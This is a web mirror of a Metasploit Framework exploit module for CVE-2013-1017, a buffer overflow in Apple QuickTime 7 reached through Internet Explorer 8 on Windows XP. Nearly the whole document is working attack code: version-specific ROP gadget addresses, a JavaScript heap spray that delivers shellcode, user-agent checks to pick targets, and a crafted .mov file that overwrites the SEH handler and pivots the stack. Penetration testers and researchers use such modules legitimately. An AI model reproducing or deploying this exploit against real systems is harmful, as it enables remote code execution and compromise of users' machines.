CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::RopDb

11


12
  def initialize(info={})

13
    super(update_info(info,

14
      'Name'           => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",

15
      'Description'    => %q{

16
        This module exploits a vulnerability found in Apple Quicktime. The flaw is

17
        triggered when Quicktime fails to properly handle the data length for certain

18
        atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer

19
        overflow by loading a specially crafted .mov file, and allows arbitrary

20
        code execution under the context of the current user.

21
      },

22
      'License'        => MSF_LICENSE,

23
      'Author'         =>

24
        [

25
          'Jason Kratzer', # Original Discovery & PoC (overlapped finding), aka pyoor

26
          'Tom Gallagher', # Original Discovery (overlapped)

27
          'Paul Bates',    # Original Discovery (overlapped)

28
          'sinn3r'         # Metasploit

29
        ],

30
      'References'     =>

31
        [

32
          [ 'CVE', '2013-1017' ],

33
          [ 'OSVDB', '93625' ],

34
          [ 'BID', '60097' ],

35
          [ 'URL', 'http://support.apple.com/kb/HT5770' ],

36
          [ 'ZDI', '13-110' ]

37
        ],

38
      'Platform'       => 'win',

39
      'Targets'        =>

40
        [

41
          # All of the following addresses are from Quicktime.qts

42
          # RET = ADD ESP,280; RET, Nop = RET, Pop = POP ESP; RET

43
          [ 'Quicktime 7.7.3 with IE 8 on Windows XP SP3', {'Ret' => 0x66923467, 'Nop' => 0x6692346d, 'Pop' => 0x66849239} ],

44
          [ 'Quicktime 7.7.2 with IE 8 on Windows XP SP3', {'Ret' => 0x669211C7, 'Nop' => 0x669211CD, 'Pop' => 0x668C5B55} ],

45
          [ 'Quicktime 7.7.1 with IE 8 on Windows XP SP3', {'Ret' => 0x66920D67, 'Nop' => 0x66920D6D, 'Pop' => 0x66849259} ],

46
          [ 'Quicktime 7.7.0 with IE 8 on Windows XP SP3', {'Ret' => 0x66920BD7, 'Nop' => 0x66920BDD, 'Pop' => 0x668E963A} ]

47
        ],

48
      'Payload'        =>

49
        {

50
          'BadChars'        => "\x00"  # js_property_spray no like nilz

51
        },

52
      'DefaultOptions'  =>

53
        {

54
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'

55
        },

56
      'Privileged'     => false,

57
      'DisclosureDate' => '2013-05-22'

58
    ))

59
  end

60


61
  def get_payload(t)

62
    alignment = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500

63
    p = generate_rop_payload('msvcrt', alignment + payload.encoded, {'target'=>'xp'})

64
    return p

65
  end

66


67


68
  def targetable?(agent)

69
    if agent =~ /MSIE 8\.0/ and agent =~ /Windows NT 5\.1/

70
      return true

71
    elsif agent =~ /contype/

72
      # contype: a mov file request from Apple Quicktime

73
      return true

74
    end

75


76
    false

77
  end

78


79


80
  def get_html(t)

81
    js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))

82
    fake_mov_name = rand_text_alpha(4) + ".mov"

83
    html = %Q|

84
    <html>

85
    <head>

86
    <script>

87
    #{js_property_spray}

88


89
    var s = unescape("#{js_p}");

90
    sprayHeap({shellcode:s});

91
    </script>

92
    </head>

93
    <body>

94
    <embed src="#{get_resource}/#{fake_mov_name}" width="0" height="0"></embed>

95
    </body>

96
    </html>

97
    |

98


99
    html.gsub(/^ {4}/, '')

100
  end

101


102


103
  def on_request_uri(cli, request)

104
    agent = request.headers['User-Agent']

105
    print_status("Requesting: #{request.uri}")

106


107
    unless targetable?(agent)

108
      print_error("Browser not supported, sending 404: #{agent}")

109
      send_not_found(cli)

110
      return

111
    end

112


113
    print_status("Target selected as: #{target.name}") if target

114


115
    if request.uri =~ /\.mov$/

116
      print_status("Sending specially crafted .mov file")

117
      send_response(cli, @exploit, { 'Content-Type' => 'application/octet-stream' })

118
    else

119
      html = get_html(target)

120
      send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })

121
    end

122
  end

123


124
  def sort_bytes(data)

125
    data.map { |e| [e].pack('N').scan(/../).reverse.join }.join

126
  end

127


128
  def rop_nop(t)

129
    [t['Nop']].pack('V*')                    # Ret (QuickTime.qts)

130
  end

131


132
  def exploit

133
    buf = ''

134
    buf << rand_text_alpha(467)              # 467 to align the pivot

135
    10.times {

136
      buf << rop_nop(target)

137
    }

138
    buf << [

139
      target['Pop'],                       # POP ESP; RET (QuickTime.qts)

140
      0x20302020                           # Target value for ESP (our ROP payload)

141
    ].pack('V*')

142
    buf << rand_text_alpha(611 - buf.length) # Offset 611 to hit SE Handler

143
    buf << sort_bytes([target.ret])          # ADD ESP,280; RET (QuickTime.qts) - pivot

144
    buf << rand_text_alpha(658 - buf.length) # 658 bytes to pad up the mov file size

145


146
    # Quicktime File Format Specifications:

147
    # https://developer.apple.com/standards/qtff-2001.pdf

148
    mov  = "\x00\x00\x06\xDF"                # File size

149
    mov << "moov"                            # Movie atom

150
    mov << "\x00\x00\x06\xD7"                # size (1751d)

151
    mov << "rmra"                            # Reference Movie atom

152
    mov << "\x00\x00\x06\xCF"                # size (1743d)

153
    mov << "rmda"                            # rmda atom

154
    mov << "\x00\x00\x06\xBF"                # size (1727d)

155
    mov << "rdrf"                            # Data reference atom

156
    mov << "\x00\x00\x00\x00"                # size set to 0

157
    mov << "alis"                            # Data reference type: FS alias record

158
    mov << "\x00\x00\x06\xAA"                # Size (1706d)

159
    mov << rand_text_alpha(8)

160
    mov << "\x00\x00\x06\x61"                # Size (1633d)

161
    mov << rand_text_alpha(38)

162
    mov << "\x12"

163
    mov << rand_text_alpha(81)

164
    mov << "\xFF\xFF"

165
    mov << rand_text_alpha(18)

166
    mov << "\x00\x08"                        # Size (8d)

167
    mov << rand_text_alpha(8)

168
    mov << "\x00\x00"

169
    mov << "\x00\x08"                        # Size (8d)

170
    mov << rand_text_alpha(8)

171
    mov << "\x00\x00"

172
    mov << "\x00\x26"                        # Size (38d)

173
    mov << rand_text_alpha(38)

174
    mov << "\x00\x0F\x00\x0E"

175
    mov << "AA"                              # Size (must be invalid)

176
    mov << rand_text_alpha(12)

177
    mov << "\x00\x12\x00\x21"

178
    mov << rand_text_alpha(36)

179
    mov << "\x00"

180
    mov << "\x0F\x33"

181
    mov << rand_text_alpha(17)

182
    mov << "\x02\xF4"                        # Size (756h)

183
    mov << rand_text_alpha(756)

184
    mov << "\xFF\xFF\x00\x00\x00"

185
    mov << buf

186


187
    @exploit = mov

188
    super

189
  end

190
end

191


192